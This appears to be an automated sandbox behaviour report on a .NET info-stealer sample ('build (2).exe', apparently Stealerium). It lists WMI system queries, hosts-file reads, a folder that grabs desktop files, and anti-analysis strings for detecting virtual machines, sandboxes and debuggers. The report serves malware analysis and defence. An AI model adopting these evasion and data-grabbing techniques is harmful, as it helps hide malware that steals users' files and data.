Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\build (2).exe

File created: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c

Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

File created: C:\Users\user\AppData\Local\Temp\tmpCF58.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@18/73@11/5

Source: build (2).exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\build (2).exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Users\user\Desktop\build (2).exe	Mutant created: \Sessions\1\BaseNamedObjects\SLEHWAD30NETPGH8V4D6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_01

Source: build (2).exe

String found in binary or memory: /C -StartDelay : Sleeping ISetFileCreationDate : Changing file

Source: build (2).exe, Stealerium/Modules/Implant/StringsCrypt.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.build (2).exe.130000.0.unpack, Stealerium/Modules/Implant/StringsCrypt.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.build (2).exe.130000.0.unpack, Stealerium/Modules/Implant/StringsCrypt.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: build (2).exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: build (2).exe

Static file information: File size 1569792 > 1048576

Source: build (2).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: build (2).exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x17dc00

Source: build (2).exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: build (2).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .16.0.0, Culture=neutral, PublicKeyToken=6583c7c814667745\|DotNetZip.dll\|1EE724DAAF70C6B0083BF589674B6F6D8427544F\|472064 costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 costura.microsoft.bcl.asyncinterfaces.dll source: build (2).exe
Source:	Binary string: ~l costura.dotnetzip.pdb.compressed source: build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|FD65CB8378305DD2185A5847C599E82A6AA5AD7A\|81672 source: build (2).exe
Source:	Binary string: costura.dotnetzip.pdb.compressed source: build (2).exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed-discord-webhook-client[costura.discord-webhook-client.dll.compressed source: build (2).exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed source: build (2).exe
Source:	Binary string: costura.costura.pdb.compressed source: build (2).exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 source: build (2).exe
Source:	Binary string: dotnetzipAcostura.dotnetzip.dll.compressedAcostura.dotnetzip.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed source: build (2).exe
Source:	Binary string: ll.compressed\|7.0.0.0\|Polly, Version=7.0.0.0, Culture=neutral, PublicKeyToken=c8a3ffc3f8f825cc\|Polly.dll\|D40D09B9BC8B46EBFE63C6B8E605827156146983\|274944 costura.polly.pdb.compressed\|\|\|Polly.pdb\|FD65CB8378305DD2185A5847C599E82A6AA5AD7A\|81672 costura.system.bu source: build (2).exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256 source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: build (2).exe, 00000000.00000002.531081210.0000000005050000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.530316264.0000000003799000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: build (2).exe
Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: build (2).exe
Source:	Binary string: costura.costura.dll.compressed\|5.7.0.0\|Costura, Version=5.7.0.0, Culture=neutral, PublicKeyToken=null\|Costura.dll\|F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906\|4608 costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 costura source: build (2).exe

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: build (2).exe, type: SAMPLE
Source: Yara match	File source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build (2).exe PID: 3704, type: MEMORYSTR

Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_0013912C pushfd ; retf	0_2_0013912D
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A64FC8 push eax; mov dword ptr [esp], ecx	0_2_00A65274
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A65260 push eax; mov dword ptr [esp], ecx	0_2_00A65274

Source: build (2).exe

Static PE information: 0x8E8BD757 [Fri Oct 13 17:41:43 2045 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.936175202761423

Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\build (2).exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\build (2).exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.jpg	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\	Jump to behavior

Source: build (2).exe, 00000000.00000002.525847639.00000000025CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: build (2).exe	Binary or memory string: [Virtualization] VirtualMachine:
Source: build (2).exe	Binary or memory string: vmware
Source: build (2).exe	Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: build (2).exe, 00000000.00000002.531611297.000000000525C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D::
Source: build (2).exe, 00000000.00000002.531931444.0000000005330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: build (2).exe, 00000000.00000003.503765143.0000000005379000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareEUH_DVS9Win32_VideoController56527UE8VideoController120060621000000.000000-00010652887display.infMSBDAUO_18EH4PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors6GDUAHUXLMEMp
